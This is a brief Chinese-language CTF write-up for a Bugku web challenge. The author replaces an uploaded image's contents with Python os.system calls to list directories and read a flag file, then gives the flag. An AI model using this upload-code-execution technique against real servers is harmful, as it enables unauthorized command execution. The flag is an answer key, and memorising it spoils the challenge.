https://ctf.bugku.com/challenges/detail/id/204.html

 

打开页面是这个样子。右键查看源代码。

它提示我说会用Python去执行。太棒了。

选择一张普通图片。点击上传。把流量转到burpsuite上。

把burpsuite上抓到的包发送到重发模块

把图片的内容删除。改成

import os
print(os.system('ls -al'))

发现执行了Python，想了一下。应该是Python执行系统命令。
 

 一步一步。发现上一级目录上有一个flag的文件。

执行下面的代码：

import os
print(os.system('cat ../flag'))

就得到了flag

flag{5f40e0bdb1089bf9dcb06a384c2b2008}